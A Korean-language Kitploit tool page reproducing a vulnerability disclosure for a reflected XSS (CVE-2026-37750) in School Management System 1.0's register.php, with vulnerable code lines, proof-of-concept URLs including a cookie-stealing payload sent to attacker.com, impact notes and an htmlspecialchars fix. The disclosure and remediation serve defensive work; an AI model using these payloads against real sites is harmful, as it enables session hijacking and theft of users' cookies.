Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-37750 — # School Management System 1.0용 반사형 XSS 개념 증명 School Management System 1.0의 반사형 XSS 개념 증명으로, register.php의 type 매개변수를 통한 인증되지 않은 JavaScript 실행을 시연하며, 영향 분석 및 수정 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/menevarad007/cve-2026-37750
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityLearning & Education
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

# School Management System 1.0용 반사형 XSS 개념 증명 School Management System 1.0의 반사형 XSS 개념 증명으로, register.php의 type 매개변수를 통한 인증되지 않은 JavaScript 실행을 시연하며, 영향 분석 및 수정 지침을 포함합니다.

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-37750 — School Management System 1.0 - 반사형 XSS

세부 정보

필드정보
CVE IDCVE-2026-37750
유형반사형 교차 사이트 스크립팅 (XSS)
심각도중간 (CVSSv3: 6.1)
공급업체mahmoudai1
제품School Management System
버전1.0
발견자Varad AP Mene
날짜2026-04-16
CWECWE-79

설명

mahmoudai1이 개발한 School Management System 1.0의 반사형 교차 사이트 스크립팅(XSS) 취약점으로, 인증되지 않은 원격 공격자가 register.php의 살균되지 않은 type 매개변수를 통해 피해자 브라우저에서 임의의 JavaScript를 실행할 수 있습니다. 해당 매개변수는 22행의 h1 태그 내부와 26행의 form action 속성 내부에서 이스케이프 없이 반사됩니다. 이 취약점을 악용하는 데 인증이 필요하지 않습니다.

CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 중간 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


제품 설명

School Management System 1.0은 GitHub에서 mahmoudai1이 개발한 PHP/MySQL 웹 애플리케이션으로, 학교에서 학생, 교사 및 학부모를 관리하는 데 사용됩니다.

공급업체 URL: https://github.com/mahmoudai1/school-management-system


취약한 파일

register.php — 등록 양식 (인증 불필요)


취약한 코드

22행: echo ucfirst($_REQUEST['type'])

26행: echo $_REQUEST['type']

htmlspecialchars()가 사용되지 않음 — 원시 사용자 입력이 HTML에 직접 반사됩니다.


개념 증명

전제 조건:

  • 인증 불필요
  • 대상이 School Management System 1.0을 실행 중이어야 함

1단계 — 브라우저를 열고 다음 URL을 방문합니다: http://target/register.php?type=script-alert-document.cookie-/script

2단계 — 브라우저에서 JavaScript가 실행됩니다 결과: 세션 쿠키를 표시하는 경고 상자가 나타납니다.

3단계 — 쿠키 탈취 페이로드: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script 4단계 — form action 주입 페이로드: http://target/register.php?type="-script-alert(1)-/script

두 개의 주입 지점이 확인되었습니다:

주입 지점 1 — h1 태그 내부 (22행):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

출력:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

주입 지점 2 — form action 속성 내부 (26행):

root@kitploit:~
echo $_REQUEST['type']

출력:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

영향

  • 쿠키 탈취를 통한 세션 하이재킹
  • 피싱 — 가짜 로그인 양식 주입
  • 리디렉션을 통한 악성코드 유포
  • 인증 불필요

해결 방법

22행 수정: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

26행 수정: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


참고 자료

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

발견자

Varad AP Mene 이메일: [email protected] GitHub: https://github.com/menevarad007

도구 다운로드